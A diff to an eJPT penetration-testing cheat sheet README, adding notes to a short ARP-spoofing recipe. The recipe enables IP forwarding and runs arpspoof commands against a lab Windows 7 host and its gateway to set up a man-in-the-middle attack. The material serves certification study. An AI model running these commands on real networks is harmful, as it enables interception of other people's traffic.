RadeelAhmad/eJPT-CheatSheet/README.md

 echo 1 > /proc/sys/net/ipv4/ip_forward
 ```

-> This command can be used to enable ip-forwarding.
+> This command can be used to enable ip-forwarding. in seperate terminal

 ```Shell
 arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
 arpspoof -i eth1 -t 172.16.5.1 172.16.5.5
 ```
+***Windows 7 at 172.16.5.5, and the default gateway at 172.16.5.1***

-> The attacker positions themselves in the middle of the communication between `172.16.5.5` and `172.16.5.1`, enabling a Man-in-the-Middle (MitM) attack.
+> The attacker positions themselves in the middle of the communication between `172.16.5.5` and `172.16.5.1`, enabling a Man-in-the-Middle (MitM) attack. both run in seperate terminal.

 ***EXPLAINATION:***